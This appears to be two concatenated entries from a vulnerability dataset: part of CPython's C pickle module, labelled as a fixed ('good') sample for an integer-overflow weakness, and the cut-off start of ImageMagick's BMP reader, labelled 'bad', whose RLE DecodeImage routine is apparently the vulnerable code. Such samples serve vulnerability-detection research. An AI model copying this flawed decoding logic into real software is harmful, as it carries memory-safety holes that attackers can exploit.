Unpickler_traverse(UnpicklerObject *self, visitproc visit, void *arg)
{
Py_VISIT(self->readline);
Py_VISIT(self->read);
Py_VISIT(self->peek);
Py_VISIT(self->stack);
Py_VISIT(self->pers_func);
return 0;
}
static int
Unpickler_clear(UnpicklerObject *self)
{
Py_CLEAR(self->readline);
Py_CLEAR(self->read);
Py_CLEAR(self->peek);
Py_CLEAR(self->stack);
Py_CLEAR(self->pers_func);
if (self->buffer.buf != NULL) {
PyBuffer_Release(&self->buffer);
self->buffer.buf = NULL;
}
_Unpickler_MemoCleanup(self);
PyMem_Free(self->marks);
self->marks = NULL;
PyMem_Free(self->input_line);
self->input_line = NULL;
PyMem_Free(self->encoding);
self->encoding = NULL;
PyMem_Free(self->errors);
self->errors = NULL;
return 0;
}
/*[clinic input]
_pickle.Unpickler.__init__
file: object
*
fix_imports: bool = True
encoding: str = 'ASCII'
errors: str = 'strict'
This takes a binary file for reading a pickle data stream.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
The argument *file* must have two methods, a read() method that takes
an integer argument, and a readline() method that requires no
arguments. Both methods should return bytes. Thus *file* can be a
binary file object opened for reading, an io.BytesIO object, or any
other custom object that meets this interface.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle stream
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static int
_pickle_Unpickler___init___impl(UnpicklerObject *self, PyObject *file,
int fix_imports, const char *encoding,
const char *errors)
/*[clinic end generated code: output=e2c8ce748edc57b0 input=f9b7da04f5f4f335]*/
{
_Py_IDENTIFIER(persistent_load);
/* In case of multiple __init__() calls, clear previous content. */
if (self->read != NULL)
(void)Unpickler_clear(self);
if (_Unpickler_SetInputStream(self, file) < 0)
return -1;
if (_Unpickler_SetInputEncoding(self, encoding, errors) < 0)
return -1;
self->fix_imports = fix_imports;
if (init_method_ref((PyObject *)self, &PyId_persistent_load,
&self->pers_func, &self->pers_func_self) < 0)
{
return -1;
}
self->stack = (Pdata *)Pdata_New();
if (self->stack == NULL)
return 1;
self->memo_size = 32;
self->memo = _Unpickler_NewMemo(self->memo_size);
if (self->memo == NULL)
return -1;
self->proto = 0;
return 0;
}
/* Define a proxy object for the Unpickler's internal memo object. This is to
* avoid breaking code like:
* unpickler.memo.clear()
* and
* unpickler.memo = saved_memo
* Is this a good idea? Not really, but we don't want to break code that uses
* it. Note that we don't implement the entire mapping API here. This is
* intentional, as these should be treated as black-box implementation details.
*
* We do, however, have to implement pickling/unpickling support because of
* real-world code like cvs2svn.
*/
/*[clinic input]
_pickle.UnpicklerMemoProxy.clear
Remove all items from memo.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy_clear_impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=d20cd43f4ba1fb1f input=b1df7c52e7afd9bd]*/
{
_Unpickler_MemoCleanup(self->unpickler);
self->unpickler->memo = _Unpickler_NewMemo(self->unpickler->memo_size);
if (self->unpickler->memo == NULL)
return NULL;
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.UnpicklerMemoProxy.copy
Copy the memo to a new object.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy_copy_impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=e12af7e9bc1e4c77 input=97769247ce032c1d]*/
{
size_t i;
PyObject *new_memo = PyDict_New();
if (new_memo == NULL)
return NULL;
for (i = 0; i < self->unpickler->memo_size; i++) {
int status;
PyObject *key, *value;
value = self->unpickler->memo[i];
if (value == NULL)
continue;
key = PyLong_FromSsize_t(i);
if (key == NULL)
goto error;
status = PyDict_SetItem(new_memo, key, value);
Py_DECREF(key);
if (status < 0)
goto error;
}
return new_memo;
error:
Py_DECREF(new_memo);
return NULL;
}
/*[clinic input]
_pickle.UnpicklerMemoProxy.__reduce__
Implement pickling support.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy___reduce___impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=6da34ac048d94cca input=6920862413407199]*/
{
PyObject *reduce_value;
PyObject *constructor_args;
PyObject *contents = _pickle_UnpicklerMemoProxy_copy_impl(self);
if (contents == NULL)
return NULL;
reduce_value = PyTuple_New(2);
if (reduce_value == NULL) {
Py_DECREF(contents);
return NULL;
}
constructor_args = PyTuple_New(1);
if (constructor_args == NULL) {
Py_DECREF(contents);
Py_DECREF(reduce_value);
return NULL;
}
PyTuple_SET_ITEM(constructor_args, 0, contents);
Py_INCREF((PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 0, (PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 1, constructor_args);
return reduce_value;
}
static PyMethodDef unpicklerproxy_methods[] = {
_PICKLE_UNPICKLERMEMOPROXY_CLEAR_METHODDEF
_PICKLE_UNPICKLERMEMOPROXY_COPY_METHODDEF
_PICKLE_UNPICKLERMEMOPROXY___REDUCE___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
UnpicklerMemoProxy_dealloc(UnpicklerMemoProxyObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->unpickler);
PyObject_GC_Del((PyObject *)self);
}
static int
UnpicklerMemoProxy_traverse(UnpicklerMemoProxyObject *self,
visitproc visit, void *arg)
{
Py_VISIT(self->unpickler);
return 0;
}
static int
UnpicklerMemoProxy_clear(UnpicklerMemoProxyObject *self)
{
Py_CLEAR(self->unpickler);
return 0;
}
static PyTypeObject UnpicklerMemoProxyType = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.UnpicklerMemoProxy", /*tp_name*/
sizeof(UnpicklerMemoProxyObject), /*tp_basicsize*/
0,
(destructor)UnpicklerMemoProxy_dealloc, /* tp_dealloc */
0, /* tp_print */
0, /* tp_getattr */
0, /* tp_setattr */
0, /* tp_compare */
0, /* tp_repr */
0, /* tp_as_number */
0, /* tp_as_sequence */
0, /* tp_as_mapping */
PyObject_HashNotImplemented, /* tp_hash */
0, /* tp_call */
0, /* tp_str */
PyObject_GenericGetAttr, /* tp_getattro */
PyObject_GenericSetAttr, /* tp_setattro */
0, /* tp_as_buffer */
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
0, /* tp_doc */
(traverseproc)UnpicklerMemoProxy_traverse, /* tp_traverse */
(inquiry)UnpicklerMemoProxy_clear, /* tp_clear */
0, /* tp_richcompare */
0, /* tp_weaklistoffset */
0, /* tp_iter */
0, /* tp_iternext */
unpicklerproxy_methods, /* tp_methods */
};
static PyObject *
UnpicklerMemoProxy_New(UnpicklerObject *unpickler)
{
UnpicklerMemoProxyObject *self;
self = PyObject_GC_New(UnpicklerMemoProxyObject,
&UnpicklerMemoProxyType);
if (self == NULL)
return NULL;
Py_INCREF(unpickler);
self->unpickler = unpickler;
PyObject_GC_Track(self);
return (PyObject *)self;
}
/*****************************************************************************/
static PyObject *
Unpickler_get_memo(UnpicklerObject *self)
{
return UnpicklerMemoProxy_New(self);
}
static int
Unpickler_set_memo(UnpicklerObject *self, PyObject *obj)
{
PyObject **new_memo;
size_t new_memo_size = 0;
if (obj == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (Py_TYPE(obj) == &UnpicklerMemoProxyType) {
UnpicklerObject *unpickler =
((UnpicklerMemoProxyObject *)obj)->unpickler;
new_memo_size = unpickler->memo_size;
new_memo = _Unpickler_NewMemo(new_memo_size);
if (new_memo == NULL)
return -1;
for (size_t i = 0; i < new_memo_size; i++) {
Py_XINCREF(unpickler->memo[i]);
new_memo[i] = unpickler->memo[i];
}
}
else if (PyDict_Check(obj)) {
Py_ssize_t i = 0;
PyObject *key, *value;
new_memo_size = PyDict_GET_SIZE(obj);
new_memo = _Unpickler_NewMemo(new_memo_size);
if (new_memo == NULL)
return -1;
while (PyDict_Next(obj, &i, &key, &value)) {
Py_ssize_t idx;
if (!PyLong_Check(key)) {
PyErr_SetString(PyExc_TypeError,
"memo key must be integers");
goto error;
}
idx = PyLong_AsSsize_t(key);
if (idx == -1 && PyErr_Occurred())
goto error;
if (idx < 0) {
PyErr_SetString(PyExc_ValueError,
"memo key must be positive integers.");
goto error;
}
if (_Unpickler_MemoPut(self, idx, value) < 0)
goto error;
}
}
else {
PyErr_Format(PyExc_TypeError,
"'memo' attribute must be an UnpicklerMemoProxy object"
"or dict, not %.200s", Py_TYPE(obj)->tp_name);
return -1;
}
_Unpickler_MemoCleanup(self);
self->memo_size = new_memo_size;
self->memo = new_memo;
return 0;
error:
if (new_memo_size) {
for (size_t i = new_memo_size - 1; i != SIZE_MAX; i--) {
Py_XDECREF(new_memo[i]);
}
PyMem_FREE(new_memo);
}
return -1;
}
static PyObject *
Unpickler_get_persload(UnpicklerObject *self)
{
if (self->pers_func == NULL) {
PyErr_SetString(PyExc_AttributeError, "persistent_load");
return NULL;
}
return reconstruct_method(self->pers_func, self->pers_func_self);
}
static int
Unpickler_set_persload(UnpicklerObject *self, PyObject *value)
{
if (value == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (!PyCallable_Check(value)) {
PyErr_SetString(PyExc_TypeError,
"persistent_load must be a callable taking "
"one argument");
return -1;
}
self->pers_func_self = NULL;
Py_INCREF(value);
Py_XSETREF(self->pers_func, value);
return 0;
}
static PyGetSetDef Unpickler_getsets[] = {
{"memo", (getter)Unpickler_get_memo, (setter)Unpickler_set_memo},
{"persistent_load", (getter)Unpickler_get_persload,
(setter)Unpickler_set_persload},
{NULL}
};
static PyTypeObject Unpickler_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Unpickler", /*tp_name*/
sizeof(UnpicklerObject), /*tp_basicsize*/
0, /*tp_itemsize*/
(destructor)Unpickler_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_reserved*/
0, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
_pickle_Unpickler___init____doc__, /*tp_doc*/
(traverseproc)Unpickler_traverse, /*tp_traverse*/
(inquiry)Unpickler_clear, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
Unpickler_methods, /*tp_methods*/
0, /*tp_members*/
Unpickler_getsets, /*tp_getset*/
0, /*tp_base*/
0, /*tp_dict*/
0, /*tp_descr_get*/
0, /*tp_descr_set*/
0, /*tp_dictoffset*/
_pickle_Unpickler___init__, /*tp_init*/
PyType_GenericAlloc, /*tp_alloc*/
PyType_GenericNew, /*tp_new*/
PyObject_GC_Del, /*tp_free*/
0, /*tp_is_gc*/
};
/*[clinic input]
_pickle.dump
obj: object
file: object
protocol: object = NULL
*
fix_imports: bool = True
Write a pickled representation of obj to the open file object file.
This is equivalent to ``Pickler(file, protocol).dump(obj)``, but may
be more efficient.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 4. It was introduced in Python 3.4, it is incompatible
with previous versions.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
The *file* argument must have a write() method that accepts a single
bytes argument. It can thus be a file object opened for binary
writing, an io.BytesIO instance, or any other custom object that meets
this interface.
If *fix_imports* is True and protocol is less than 3, pickle will try
to map the new Python 3 names to the old module names used in Python
2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static PyObject *
_pickle_dump_impl(PyObject *module, PyObject *obj, PyObject *file,
PyObject *protocol, int fix_imports)
/*[clinic end generated code: output=a4774d5fde7d34de input=93f1408489a87472]*/
{
PicklerObject *pickler = _Pickler_New();
if (pickler == NULL)
return NULL;
if (_Pickler_SetProtocol(pickler, protocol, fix_imports) < 0)
goto error;
if (_Pickler_SetOutputStream(pickler, file) < 0)
goto error;
if (dump(pickler, obj) < 0)
goto error;
if (_Pickler_FlushToFile(pickler) < 0)
goto error;
Py_DECREF(pickler);
Py_RETURN_NONE;
error:
Py_XDECREF(pickler);
return NULL;
}
/*[clinic input]
_pickle.dumps
obj: object
protocol: object = NULL
*
fix_imports: bool = True
Return the pickled representation of the object as a bytes object.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 4. It was introduced in Python 3.4, it is incompatible
with previous versions.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
If *fix_imports* is True and *protocol* is less than 3, pickle will
try to map the new Python 3 names to the old module names used in
Python 2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static PyObject *
_pickle_dumps_impl(PyObject *module, PyObject *obj, PyObject *protocol,
int fix_imports)
/*[clinic end generated code: output=d75d5cda456fd261 input=b6efb45a7d19b5ab]*/
{
PyObject *result;
PicklerObject *pickler = _Pickler_New();
if (pickler == NULL)
return NULL;
if (_Pickler_SetProtocol(pickler, protocol, fix_imports) < 0)
goto error;
if (dump(pickler, obj) < 0)
goto error;
result = _Pickler_GetString(pickler);
Py_DECREF(pickler);
return result;
error:
Py_XDECREF(pickler);
return NULL;
}
/*[clinic input]
_pickle.load
file: object
*
fix_imports: bool = True
encoding: str = 'ASCII'
errors: str = 'strict'
Read and return an object from the pickle data stored in a file.
This is equivalent to ``Unpickler(file).load()``, but may be more
efficient.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
The argument *file* must have two methods, a read() method that takes
an integer argument, and a readline() method that requires no
arguments. Both methods should return bytes. Thus *file* can be a
binary file object opened for reading, an io.BytesIO object, or any
other custom object that meets this interface.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle stream
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static PyObject *
_pickle_load_impl(PyObject *module, PyObject *file, int fix_imports,
const char *encoding, const char *errors)
/*[clinic end generated code: output=69e298160285199e input=01b44dd3fc07afa7]*/
{
PyObject *result;
UnpicklerObject *unpickler = _Unpickler_New();
if (unpickler == NULL)
return NULL;
if (_Unpickler_SetInputStream(unpickler, file) < 0)
goto error;
if (_Unpickler_SetInputEncoding(unpickler, encoding, errors) < 0)
goto error;
unpickler->fix_imports = fix_imports;
result = load(unpickler);
Py_DECREF(unpickler);
return result;
error:
Py_XDECREF(unpickler);
return NULL;
}
/*[clinic input]
_pickle.loads
data: object
*
fix_imports: bool = True
encoding: str = 'ASCII'
errors: str = 'strict'
Read and return an object from the given pickle data.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle stream
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static PyObject *
_pickle_loads_impl(PyObject *module, PyObject *data, int fix_imports,
const char *encoding, const char *errors)
/*[clinic end generated code: output=1e7cb2343f2c440f input=70605948a719feb9]*/
{
PyObject *result;
UnpicklerObject *unpickler = _Unpickler_New();
if (unpickler == NULL)
return NULL;
if (_Unpickler_SetStringInput(unpickler, data) < 0)
goto error;
if (_Unpickler_SetInputEncoding(unpickler, encoding, errors) < 0)
goto error;
unpickler->fix_imports = fix_imports;
result = load(unpickler);
Py_DECREF(unpickler);
return result;
error:
Py_XDECREF(unpickler);
return NULL;
}
static struct PyMethodDef pickle_methods[] = {
_PICKLE_DUMP_METHODDEF
_PICKLE_DUMPS_METHODDEF
_PICKLE_LOAD_METHODDEF
_PICKLE_LOADS_METHODDEF
{NULL, NULL} /* sentinel */
};
static int
pickle_clear(PyObject *m)
{
_Pickle_ClearState(_Pickle_GetState(m));
return 0;
}
static void
pickle_free(PyObject *m)
{
_Pickle_ClearState(_Pickle_GetState(m));
}
static int
pickle_traverse(PyObject *m, visitproc visit, void *arg)
{
PickleState *st = _Pickle_GetState(m);
Py_VISIT(st->PickleError);
Py_VISIT(st->PicklingError);
Py_VISIT(st->UnpicklingError);
Py_VISIT(st->dispatch_table);
Py_VISIT(st->extension_registry);
Py_VISIT(st->extension_cache);
Py_VISIT(st->inverted_registry);
Py_VISIT(st->name_mapping_2to3);
Py_VISIT(st->import_mapping_2to3);
Py_VISIT(st->name_mapping_3to2);
Py_VISIT(st->import_mapping_3to2);
Py_VISIT(st->codecs_encode);
Py_VISIT(st->getattr);
return 0;
}
static struct PyModuleDef _picklemodule = {
PyModuleDef_HEAD_INIT,
"_pickle", /* m_name */
pickle_module_doc, /* m_doc */
sizeof(PickleState), /* m_size */
pickle_methods, /* m_methods */
NULL, /* m_reload */
pickle_traverse, /* m_traverse */
pickle_clear, /* m_clear */
(freefunc)pickle_free /* m_free */
};
PyMODINIT_FUNC
PyInit__pickle(void)
{
PyObject *m;
PickleState *st;
m = PyState_FindModule(&_picklemodule);
if (m) {
Py_INCREF(m);
return m;
}
if (PyType_Ready(&Unpickler_Type) < 0)
return NULL;
if (PyType_Ready(&Pickler_Type) < 0)
return NULL;
if (PyType_Ready(&Pdata_Type) < 0)
return NULL;
if (PyType_Ready(&PicklerMemoProxyType) < 0)
return NULL;
if (PyType_Ready(&UnpicklerMemoProxyType) < 0)
return NULL;
/* Create the module and add the functions. */
m = PyModule_Create(&_picklemodule);
if (m == NULL)
return NULL;
Py_INCREF(&Pickler_Type);
if (PyModule_AddObject(m, "Pickler", (PyObject *)&Pickler_Type) < 0)
return NULL;
Py_INCREF(&Unpickler_Type);
if (PyModule_AddObject(m, "Unpickler", (PyObject *)&Unpickler_Type) < 0)
return NULL;
st = _Pickle_GetState(m);
/* Initialize the exceptions. */
st->PickleError = PyErr_NewException("_pickle.PickleError", NULL, NULL);
if (st->PickleError == NULL)
return NULL;
st->PicklingError = \
PyErr_NewException("_pickle.PicklingError", st->PickleError, NULL);
if (st->PicklingError == NULL)
return NULL;
st->UnpicklingError = \
PyErr_NewException("_pickle.UnpicklingError", st->PickleError, NULL);
if (st->UnpicklingError == NULL)
return NULL;
Py_INCREF(st->PickleError);
if (PyModule_AddObject(m, "PickleError", st->PickleError) < 0)
return NULL;
Py_INCREF(st->PicklingError);
if (PyModule_AddObject(m, "PicklingError", st->PicklingError) < 0)
return NULL;
Py_INCREF(st->UnpicklingError);
if (PyModule_AddObject(m, "UnpicklingError", st->UnpicklingError) < 0)
return NULL;
if (_Pickle_InitState(st) < 0)
return NULL;
return m;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_496_0 |
crossvul-cpp_data_bad_5223_1 | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% BBBB M M PPPP %
% B B MM MM P P %
% BBBB M M M PPPP %
% B B M M P %
% BBBB M M P %
% %
% %
% Read/Write Microsoft Windows Bitmap Image Format %
% %
% Software Design %
% Cristy %
% Glenn Randers-Pehrson %
% December 2001 %
% %
% %
% Copyright 1999-2016 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% http://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/blob.h"
#include "MagickCore/blob-private.h"
#include "MagickCore/cache.h"
#include "MagickCore/colormap-private.h"
#include "MagickCore/color-private.h"
#include "MagickCore/colormap.h"
#include "MagickCore/colorspace.h"
#include "MagickCore/colorspace-private.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/image.h"
#include "MagickCore/image-private.h"
#include "MagickCore/list.h"
#include "MagickCore/log.h"
#include "MagickCore/magick.h"
#include "MagickCore/memory_.h"
#include "MagickCore/monitor.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/option.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/profile.h"
#include "MagickCore/quantum-private.h"
#include "MagickCore/static.h"
#include "MagickCore/string_.h"
#include "MagickCore/module.h"
#include "MagickCore/transform.h"
/*
Macro definitions (from Windows wingdi.h).
*/
#undef BI_JPEG
#define BI_JPEG 4
#undef BI_PNG
#define BI_PNG 5
#if !defined(MAGICKCORE_WINDOWS_SUPPORT) || defined(__MINGW32__) || defined(__MINGW64__)
#undef BI_RGB
#define BI_RGB 0
#undef BI_RLE8
#define BI_RLE8 1
#undef BI_RLE4
#define BI_RLE4 2
#undef BI_BITFIELDS
#define BI_BITFIELDS 3
#undef LCS_CALIBRATED_RBG
#define LCS_CALIBRATED_RBG 0
#undef LCS_sRGB
#define LCS_sRGB 1
#undef LCS_WINDOWS_COLOR_SPACE
#define LCS_WINDOWS_COLOR_SPACE 2
#undef PROFILE_LINKED
#define PROFILE_LINKED 3
#undef PROFILE_EMBEDDED
#define PROFILE_EMBEDDED 4
#undef LCS_GM_BUSINESS
#define LCS_GM_BUSINESS 1 /* Saturation */
#undef LCS_GM_GRAPHICS
#define LCS_GM_GRAPHICS 2 /* Relative */
#undef LCS_GM_IMAGES
#define LCS_GM_IMAGES 4 /* Perceptual */
#undef LCS_GM_ABS_COLORIMETRIC
#define LCS_GM_ABS_COLORIMETRIC 8 /* Absolute */
#endif
/*
Typedef declarations.
*/
typedef struct _BMPInfo
{
unsigned long
file_size,
ba_offset,
offset_bits,
size;
ssize_t
width,
height;
unsigned short
planes,
bits_per_pixel;
unsigned long
compression,
image_size,
x_pixels,
y_pixels,
number_colors,
red_mask,
green_mask,
blue_mask,
alpha_mask,
colors_important;
long
colorspace;
PrimaryInfo
red_primary,
green_primary,
blue_primary,
gamma_scale;
} BMPInfo;
/*
Forward declarations.
*/
static MagickBooleanType
WriteBMPImage(const ImageInfo *,Image *,ExceptionInfo *);
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DecodeImage unpacks the packed image pixels into runlength-encoded
% pixel packets.
%
% The format of the DecodeImage method is:
%
% MagickBooleanType DecodeImage(Image *image,
% const size_t compression,unsigned char *pixels)
%
% A description of each parameter follows:
%
% o image: the address of a structure of type Image.
%
% o compression: Zero means uncompressed. A value of 1 means the
% compressed pixels are runlength encoded for a 256-color bitmap.
% A value of 2 means a 16-color bitmap. A value of 3 means bitfields
% encoding.
%
% o pixels: The address of a byte (8 bits) array of pixel data created by
% the decoding process.
%
*/
static MagickBooleanType DecodeImage(Image *image,const size_t compression,
unsigned char *pixels)
{
int
count;
register ssize_t
i,
x;
register unsigned char
*p,
*q;
ssize_t
y;
unsigned char
byte;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(pixels != (unsigned char *) NULL);
(void) ResetMagickMemory(pixels,0,(size_t) image->columns*image->rows*
sizeof(*pixels));
byte=0;
x=0;
p=pixels;
q=pixels+(size_t) image->columns*image->rows;
for (y=0; y < (ssize_t) image->rows; )
{
MagickBooleanType
status;
if ((p < pixels) || (p > q))
break;
count=ReadBlobByte(image);
if (count == EOF)
break;
if (count != 0)
{
/*
Encoded mode.
*/
count=(int) MagickMin((ssize_t) count,(ssize_t) (q-p));
byte=(unsigned char) ReadBlobByte(image);
if (compression == BI_RLE8)
{
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char) byte;
}
else
{
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char)
((i & 0x01) != 0 ? (byte & 0x0f) : ((byte >> 4) & 0x0f));
}
x+=count;
}
else
{
/*
Escape mode.
*/
count=ReadBlobByte(image);
if (count == EOF)
break;
if (count == 0x01)
return(MagickTrue);
switch (count)
{
case 0x00:
{
/*
End of line.
*/
x=0;
y++;
p=pixels+y*image->columns;
break;
}
case 0x02:
{
/*
Delta mode.
*/
x+=ReadBlobByte(image);
y+=ReadBlobByte(image);
p=pixels+y*image->columns+x;
break;
}
default:
{
/*
Absolute mode.
*/
count=(int) MagickMin((ssize_t) count,(ssize_t) (q-p));
if (compression == BI_RLE8)
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char) ReadBlobByte(image);
else
for (i=0; i < (ssize_t) count; i++)
{
if ((i & 0x01) == 0)
byte=(unsigned char) ReadBlobByte(image);
*p++=(unsigned char)
((i & 0x01) != 0 ? (byte & 0x0f) : ((byte >> 4) & 0x0f));
}
x+=count;
/*
Read pad byte.
*/
if (compression == BI_RLE8)
{
if ((count & 0x01) != 0)
(void) ReadBlobByte(image);
}
else
if (((count & 0x03) == 1) || ((count & 0x03) == 2))
(void) ReadBlobByte(image);
break;
}
}
}
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
(void) ReadBlobByte(image); /* end of line */
(void) ReadBlobByte(image);
return(y < (ssize_t) image->rows ? MagickFalse : MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% E n c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% EncodeImage compresses pixels using a runlength encoded format.
%
% The format of the EncodeImage method is:
%
% static MagickBooleanType EncodeImage(Image *image,
% const size_t bytes_per_line,const unsigned char *pixels,
% unsigned char *compressed_pixels)
%
% A description of each parameter follows:
%
% o image: The image.
%
% o bytes_per_line: the number of bytes in a scanline of compressed pixels
%
% o pixels: The address of a byte (8 bits) array of pixel data created by
% the compression process.
%
% o compressed_pixels: The address of a byte (8 bits) array of compressed
% pixel data.
%
*/
static size_t EncodeImage(Image *image,const size_t bytes_per_line,
const unsigned char *pixels,unsigned char *compressed_pixels)
{
MagickBooleanType
status;
register const unsigned char
*p;
register ssize_t
i,
x;
register unsigned char
*q;
ssize_t
y;
/*
Runlength encode pixels.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(pixels != (const unsigned char *) NULL);
assert(compressed_pixels != (unsigned char *) NULL);
p=pixels;
q=compressed_pixels;
i=0;
for (y=0; y < (ssize_t) image->rows; y++)
{
for (x=0; x < (ssize_t) bytes_per_line; x+=i)
{
/*
Determine runlength.
*/
for (i=1; ((x+i) < (ssize_t) bytes_per_line); i++)
if ((i == 255) || (*(p+i) != *p))
break;
*q++=(unsigned char) i;
*q++=(*p);
p+=i;
}
/*
End of line.
*/
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
/*
End of bitmap.
*/
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x01;
return((size_t) (q-compressed_pixels));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s B M P %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsBMP() returns MagickTrue if the image format type, identified by the
% magick string, is BMP.
%
% The format of the IsBMP method is:
%
% MagickBooleanType IsBMP(const unsigned char *magick,const size_t length)
%
% A description of each parameter follows:
%
% o magick: compare image format pattern against these bytes.
%
% o length: Specifies the length of the magick string.
%
*/
static MagickBooleanType IsBMP(const unsigned char *magick,const size_t length)
{
if (length < 2)
return(MagickFalse);
if ((LocaleNCompare((char *) magick,"BA",2) == 0) ||
(LocaleNCompare((char *) magick,"BM",2) == 0) ||
(LocaleNCompare((char *) magick,"IC",2) == 0) ||
(LocaleNCompare((char *) magick,"PI",2) == 0) ||
